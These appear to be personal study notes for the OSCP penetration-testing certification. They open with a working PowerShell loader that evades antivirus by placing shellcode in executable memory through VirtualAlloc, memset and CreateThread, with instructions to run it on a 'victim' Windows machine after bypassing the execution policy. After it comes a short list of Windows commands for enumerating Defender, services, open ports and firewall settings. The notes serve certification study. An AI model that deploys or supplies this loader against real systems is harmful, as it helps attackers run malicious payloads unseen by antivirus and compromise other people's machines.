Antivirus Evasion

As these are my OSCP notes, and AV Evasion is outside the scope of the exam, I’m mostly leaving this content out of the guide for brevity. Below is a script for manual exploitation. It must be saved as an .ps1 file, transferred to the victim Windows machine, and ran (after powershell -ep bypass).

$code = '
[DllImport("kernel32.dll")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

[DllImport("msvcrt.dll")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);';

$winFunc = 
  Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;

[Byte[]];
[Byte[]]$sc = <place your shellcode here>;

$size = 0x1000;

if ($sc.Length -gt 0x1000) {$size = $sc.Length};

$x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);

for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};

`$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 };`

TCM Windows Privesc Notes

Service Control:

• sc query windefend - checks Windows Defender
• sc queryex type= service - shows all services running on the machine

Firewalls

• check the netstat -ano to see what ports are open
• netsh advfirewall firewall dump
• netsh firewall show state
• netsh firewall show config - just keep these in mind, but these should be automated when looking at automated tools